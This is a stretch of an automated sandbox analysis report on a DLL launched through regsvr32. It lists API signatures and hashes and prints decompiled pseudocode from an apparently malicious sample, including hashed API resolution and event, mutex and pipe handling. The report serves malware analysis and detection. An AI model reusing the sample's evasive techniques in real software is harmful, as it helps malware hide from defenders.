                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701767052.00007FFA0AE61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA0AE60000, based on PE: true
                  • Associated: 00000003.00000002.701752677.00007FFA0AE60000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701778993.00007FFA0AE62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701786113.00007FFA0AE63000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701892733.00007FFA0AEE5000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd
                  Similarity
                  • API ID: BufferConsoleFlushInput
                  • String ID: &$4$A$F$G$U$b$f$p
                  • API String ID: 320419523-419958901
                  • Opcode ID: fa8f94597c9c47fd8ebf90b9832bf50eaebafc27a4ef202f10f88f75cc5c3941
                  • Instruction ID: dc12be8a54bd6e467c8c669ca29e4bbd31f046a5c2dc1f9ac92290dccdba4210
                  • Opcode Fuzzy Hash: fa8f94597c9c47fd8ebf90b9832bf50eaebafc27a4ef202f10f88f75cc5c3941
                  • Instruction Fuzzy Hash: D711E26385C2D189E3635334F45832F6D908753348F1955EAE3CF069CAE6AED5489B13
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
                  				void* _v40;
                  				void* _v56;
                  				void* _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				long _t75;
                  				signed long long _t121;
                  				signed long long _t122;
                  				intOrPtr* _t124;
                  				void* _t151;
                  				void* _t158;
                  				void* _t172;
                  
                  				_t162 = __rbp;
                  				_t121 = __rax;
                  				_a24 = __rbx;
                  				_a32 = __rbp;
                  				_t161 =  *0x8000d4a0;
                  				_t124 = __rcx;
                  				r14d = 0;
                  				WaitForSingleObject(??, ??);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x80004372;
                  				 *_t121();
                  				_t151 = __rcx + 0x4c;
                  				r8d = 0x10;
                  				memcpy(??, ??, ??);
                  				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x800043a9;
                  				_t10 = _t151 + 1; // 0x2
                  				_t11 = _t151 + 5; // 0x6
                  				r8d = _t11;
                  				 *_t121();
                  				goto 0x800043ad;
                  				_t122 = _t121 | 0xffffffff;
                  				 *(__rcx + 0x10) = _t122;
                  				if (_t122 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t122 == _t172) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				_a8 = r14w;
                  				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d = _a8 & 0x0000ffff;
                  				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t122, _t124, _t124 + 0x10);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
                  				if (_t122 == _t172) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				_a16 = 0x10;
                  				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x800044f2;
                  				 *_t122();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				SetEvent(??);
                  				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x8000452c;
                  				 *_t122();
                  				goto 0x80004530;
                  				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
                  				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x80004504;
                  				 *_t122();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}















                  0x18000431c
                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x180004381
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x1800044fe
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				struct _CRITICAL_SECTION* _t121;
                  				long long _t124;
                  				intOrPtr* _t150;
                  				struct _CRITICAL_SECTION* _t154;
                  				long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t166;
                  				void* _t168;
                  				signed long long _t177;
                  				struct _CRITICAL_SECTION* _t179;
                  				struct _CRITICAL_SECTION* _t183;
                  				void* _t186;
                  				void* _t189;
                  				void* _t190;
                  
                  				_t177 = __r11;
                  				_t168 = __r8;
                  				_t126 = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rbx;
                  				 *((long long*)(_t165 + 0x18)) = _t161;
                  				 *((long long*)(_t165 + 0x20)) = __rsi;
                  				_t166 = _t165 - 0x60;
                  				_t159 =  *__rcx;
                  				r14d = r8d;
                  				_t190 = __rdx;
                  				_t162 = __rcx;
                  				 *((long long*)(_t166 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
                  				EnterCriticalSection(_t183);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t179);
                  				r11d =  *(_t162 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t162 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
                  				_t77 =  *_t150;
                  				if (_t77 == dil) goto 0x800097aa;
                  				if (_t77 == 0x2f) goto 0x800097a5;
                  				_t78 =  *((intOrPtr*)(_t150 + 1));
                  				if (_t78 != dil) goto 0x80009796;
                  				if (_t78 != dil) goto 0x800097ad;
                  				_t121 = _t154;
                  				if (_t121 == _t154) goto 0x800097c5;
                  				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
                  				if (_t121 == _t154) goto 0x800097e8;
                  				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t121 == _t154) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
                  				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
                  				_t24 = _t166 + 0x50; // 0x32
                  				_t124 = _t24;
                  				 *((long long*)(_t166 + 0x28)) = _t124;
                  				 *((intOrPtr*)(_t166 + 0x20)) = 0;
                  				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
                  				_t187 =  *_t162;
                  				EnterCriticalSection(_t154);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
                  				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t187 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
                  				if (_t124 == _t154) goto 0x8000992e;
                  				_t33 = _t190 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t162 + _t124)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t166 + 0x90) != 0;
                  				 *((intOrPtr*)(_t166 + 0x38)) = 2;
                  				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
                  				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
                  				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
                  				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t81;
                  				void* _t82;
                  				void* _t83;
                  				long long* _t84;
                  				void* _t104;
                  				long long _t108;
                  				void* _t111;
                  				void* _t112;
                  				void* _t121;
                  				int _t123;
                  				int _t126;
                  				void* _t129;
                  				CHAR* _t131;
                  
                  				_t81 = __rax;
                  				 *((long long*)(_t111 + 8)) = __rbx;
                  				 *((long long*)(_t111 + 0x18)) = _t108;
                  				 *((long long*)(_t111 + 0x20)) = __rsi;
                  				_t112 = _t111 - 0x1c0;
                  				_t109 =  *0x8000d4a0;
                  				r14d = 0;
                  				 *(_t112 + 0x1f8) = lstrlenA(_t131);
                  				memset(_t129, _t126, _t123);
                  				_t6 = _t104 + 1; // 0x1
                  				_t7 = _t129 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t104, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t121 = _t104;
                  				if (_t121 == _t104) goto 0x800021d9;
                  				_t8 = _t121 + 1; // 0x1
                  				 *_t121 = dil;
                  				if (_t8 == _t104) goto 0x800021d9;
                  				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(__rdx + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t81 == _t104) goto 0x800021f5;
                  				 *_t81();
                  				goto 0x800021f8;
                  				_t82 = _t104;
                  				if (_t82 != _t104) goto 0x8000224d;
                  				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t104) goto 0x8000221e;
                  				 *_t82();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t82 == _t104) goto 0x80002241;
                  				 *_t82();
                  				goto 0x80002244;
                  				_t83 = _t104;
                  				if (_t83 != _t104) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t84 =  *((intOrPtr*)(_t83 + 0x18));
                  				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t84 == _t104) goto 0x80002279;
                  				 *_t84();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
